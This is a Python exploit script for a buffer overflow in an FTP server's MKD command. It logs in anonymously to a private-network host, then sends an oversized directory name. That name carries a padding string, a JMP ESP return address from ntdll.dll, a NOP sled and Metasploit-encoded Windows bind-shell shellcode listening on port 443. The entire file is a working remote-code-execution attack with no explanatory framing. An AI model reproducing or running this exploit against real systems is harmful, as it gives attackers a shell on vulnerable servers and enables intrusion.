#!/usr/bin/python

import socket
import sys

#------------------------------------------
#msfpayload windows/shell_bind_tcp LPORT=443 R| msfencode -b '\x00\x0a\x0d\' -t c
#x86/shikata_ga_nai succeeded with size 368 (iteration=1)
#------------------------------------------
shellcode = ("\xda\xd2\xd9\x74\x24\xf4\x5a\xbe\xda\x4f\xc5\x7d\x31\xc9\xb1" +
"\x56\x83\xc2\x04\x31\x72\x14\x03\x72\xce\xad\x30\x81\x06\xb8" +
"\xbb\x7a\xd6\xdb\x32\x9f\xe7\xc9\x21\xeb\x55\xde\x22\xb9\x55" +
"\x95\x67\x2a\xee\xdb\xaf\x5d\x47\x51\x96\x50\x58\x57\x16\x3e" +
"\x9a\xf9\xea\x3d\xce\xd9\xd3\x8d\x03\x1b\x13\xf3\xeb\x49\xcc" +
"\x7f\x59\x7e\x79\x3d\x61\x7f\xad\x49\xd9\x07\xc8\x8e\xad\xbd" +
"\xd3\xde\x1d\xc9\x9c\xc6\x16\x95\x3c\xf6\xfb\xc5\x01\xb1\x70" +
"\x3d\xf1\x40\x50\x0f\xfa\x72\x9c\xdc\xc5\xba\x11\x1c\x01\x7c" +
"\xc9\x6b\x79\x7e\x74\x6c\xba\xfc\xa2\xf9\x5f\xa6\x21\x59\x84" +
"\x56\xe6\x3c\x4f\x54\x43\x4a\x17\x79\x52\x9f\x23\x85\xdf\x1e" +
"\xe4\x0f\x9b\x04\x20\x4b\x78\x24\x71\x31\x2f\x59\x61\x9d\x90" +
"\xff\xe9\x0c\xc5\x86\xb3\x58\x2a\xb5\x4b\x99\x24\xce\x38\xab" +
"\xeb\x64\xd7\x87\x64\xa3\x20\xe7\x5f\x13\xbe\x16\x5f\x64\x96" +
"\xdc\x0b\x34\x80\xf5\x33\xdf\x50\xf9\xe6\x70\x01\x55\x58\x31" +
"\xf1\x15\x08\xd9\x1b\x9a\x77\xf9\x23\x70\x0e\x3d\xea\xa0\x43" +
"\xaa\x0f\x57\x62\x91\x99\xb1\x0e\xf5\xcf\x6a\xa6\x37\x34\xa3" +
"\x51\x47\x1e\x9f\xca\xdf\x16\xc9\xcc\xe0\xa6\xdf\x7f\x4c\x0e" +
"\x88\x0b\x9e\x8b\xa9\x0c\x8b\xbb\xa0\x35\x5c\x31\xdd\xf4\xfc" +
"\x46\xf4\x6e\x9c\xd5\x93\x6e\xeb\xc5\x0b\x39\xbc\x38\x42\xaf" +
"\x50\x62\xfc\xcd\xa8\xf2\xc7\x55\x77\xc7\xc6\x54\xfa\x73\xed" +
"\x46\xc2\x7c\xa9\x32\x9a\x2a\x67\xec\x5c\x85\xc9\x46\x37\x7a" +
"\x80\x0e\xce\xb0\x13\x48\xcf\x9c\xe5\xb4\x7e\x49\xb0\xcb\x4f" +
"\x1d\x34\xb4\xad\xbd\xbb\x6f\x76\xcd\xf1\x2d\xdf\x46\x5c\xa4" +
"\x5d\x0b\x5f\x13\xa1\x32\xdc\x91\x5a\xc1\xfc\xd0\x5f\x8d\xba" +
"\x09\x12\x9e\x2e\x2d\x81\x9f\x7a")
#------------------------------------------
#Badchars: \x00\x0A\x0D
#0x7Ca58265: jmp esp # ret | ntdll.dll
#------------------------------------------
buffer = "\x90"*20 + shellcode
evil = "A"*247 + "\x65\x82\xa5\x7c" + buffer + "C"*(749-len(buffer))

s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect(("192.168.2.130",21))

s.recv(1024)
s.send("USER anonymous\r\n")
s.recv(1024)
s.send("PASS a@a\r\n")
s.recv(1024)
s.send('MKD ' + evil + '\r\n')
s.recv(1024)
s.send('QUIT\r\n')
s.close
